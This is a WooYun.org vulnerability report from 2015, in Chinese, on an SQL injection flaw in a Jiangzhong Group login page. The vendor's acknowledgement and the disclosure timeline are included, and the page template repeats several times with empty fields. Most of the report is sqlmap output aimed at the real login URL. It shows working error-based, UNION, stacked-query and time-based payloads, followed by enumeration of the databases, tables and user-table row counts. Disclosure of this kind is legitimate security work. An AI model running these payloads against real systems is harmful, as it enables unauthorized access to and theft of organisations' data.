江中集团某系统存在SQL注入漏洞 | wooyun-2015-0126509| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0126509

漏洞标题：江中集团某系统存在SQL注入漏洞

漏洞作者：浮萍

提交时间：2015-07-13 17:20

修复时间：2015-08-28 14:12

公开时间：2015-08-28 14:12

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-07-13：细节已通知厂商并且等待厂商处理中
2015-07-14：厂商已经确认，细节仅向厂商公开
2015-07-24：细节向核心白帽子及相关领域专家公开
2015-08-03：细节向普通白帽子公开
2015-08-13：细节向实习白帽子公开
2015-08-28：细节向公众公开

简要描述：

SQL注入

详细说明：

http://login.jzjt.com/login.jsp
用户名输入'

抓包

http://login.jzjt.com/login.jsp?R1.x=25&R1.y=25&passwd=a&refer=%2Femail.jsp&userid=a*

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: URI
Parameter: #1*
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: http://login.jzjt.com:80/login.jsp?R1.x=35&R1.y=52&passwd=a&refer=e
mail.jsp&userid=a' AND 9942=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(121)+CH
AR(106)+CHAR(113)+(SELECT (CASE WHEN (9942=9942) THEN CHAR(49) ELSE CHAR(48) END
))+CHAR(113)+CHAR(106)+CHAR(110)+CHAR(121)+CHAR(113))) AND 'Lvht'='Lvht
    Type: UNION query
    Title: Generic UNION query (NULL) - 23 columns
    Payload: http://login.jzjt.com:80/login.jsp?R1.x=35&R1.y=52&passwd=a&refer=e
mail.jsp&userid=a' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR
(113)+CHAR(118)+CHAR(121)+CHAR(106)+CHAR(113)+CHAR(78)+CHAR(115)+CHAR(71)+CHAR(1
08)+CHAR(72)+CHAR(77)+CHAR(85)+CHAR(102)+CHAR(89)+CHAR(87)+CHAR(113)+CHAR(106)+C
HAR(110)+CHAR(121)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,NULL,NULL,NULL--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: http://login.jzjt.com:80/login.jsp?R1.x=35&R1.y=52&passwd=a&refer=e
mail.jsp&userid=a'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: http://login.jzjt.com:80/login.jsp?R1.x=35&R1.y=52&passwd=a&refer=e
mail.jsp&userid=a' WAITFOR DELAY '0:0:5'--
---
[17:12:39] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000

当前库

web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
[17:13:10] [INFO] fetching current database
current database:    'JzWeb'

漏洞证明：

注入点

http://login.jzjt.com/login.jsp?R1.x=25&R1.y=25&passwd=a&refer=%2Femail.jsp&userid=a*

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: URI
Parameter: #1*
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: http://login.jzjt.com:80/login.jsp?R1.x=35&R1.y=52&passwd=a&refer=e
mail.jsp&userid=a' AND 9942=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(121)+CH
AR(106)+CHAR(113)+(SELECT (CASE WHEN (9942=9942) THEN CHAR(49) ELSE CHAR(48) END
))+CHAR(113)+CHAR(106)+CHAR(110)+CHAR(121)+CHAR(113))) AND 'Lvht'='Lvht
    Type: UNION query
    Title: Generic UNION query (NULL) - 23 columns
    Payload: http://login.jzjt.com:80/login.jsp?R1.x=35&R1.y=52&passwd=a&refer=e
mail.jsp&userid=a' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR
(113)+CHAR(118)+CHAR(121)+CHAR(106)+CHAR(113)+CHAR(78)+CHAR(115)+CHAR(71)+CHAR(1
08)+CHAR(72)+CHAR(77)+CHAR(85)+CHAR(102)+CHAR(89)+CHAR(87)+CHAR(113)+CHAR(106)+C
HAR(110)+CHAR(121)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,NULL,NULL,NULL--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: http://login.jzjt.com:80/login.jsp?R1.x=35&R1.y=52&passwd=a&refer=e
mail.jsp&userid=a'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: http://login.jzjt.com:80/login.jsp?R1.x=35&R1.y=52&passwd=a&refer=e
mail.jsp&userid=a' WAITFOR DELAY '0:0:5'--
---
[17:12:39] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000

数据库

available databases [10]:
[*] JzWeb
[*] lumigent
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] YC_SmartCard
[*] ysbx_zj

当前库

current database:    'JzWeb'

表

Database: JzWeb
[277 tables]

部分表

| temp_usr            |
| tmp_usr             |
| usr1                |
| usr_dep             |
| usr_dep             |
| usr_func            |
| usr_inf             |
| usr_level           |
| usr_mail_info       |
| usr_roll            |
| usr_std_level       |
| usr_table           |
| v_afr_log           |
| v_cgdetail          |
| vaframt             |
| vendor_data         |
| wjdc_jsp            |
| wlb_audit           |
| wldc2013            |
| wldc2013            |
| workflow            |
| xjlZB               |
| xjllb_qm            |
| xjllb_qm            |
| xjllb_qm            |

select count(*) from acount;:    '138'
select count(*) from usr1;:    '930'

修复方案：

版权声明：转载请注明来源浮萍@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：5

确认时间：2015-07-14 14:11

厂商回复：

非常感谢发现漏洞，我公司信息人员正在处理。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0126509

漏洞标题：江中集团某系统存在SQL注入漏洞

相关厂商：江中集团

漏洞作者：浮萍

提交时间：2015-07-13 17:20

修复时间：2015-08-28 14:12

公开时间：2015-08-28 14:12

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源浮萍@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0126509

漏洞标题：江中集团某系统存在SQL注入漏洞

相关厂商：江中集团

漏洞作者： 浮萍

提交时间：2015-07-13 17:20

修复时间：2015-08-28 14:12

公开时间：2015-08-28 14:12

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0126509"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 浮萍@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：浮萍

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源浮萍@乌云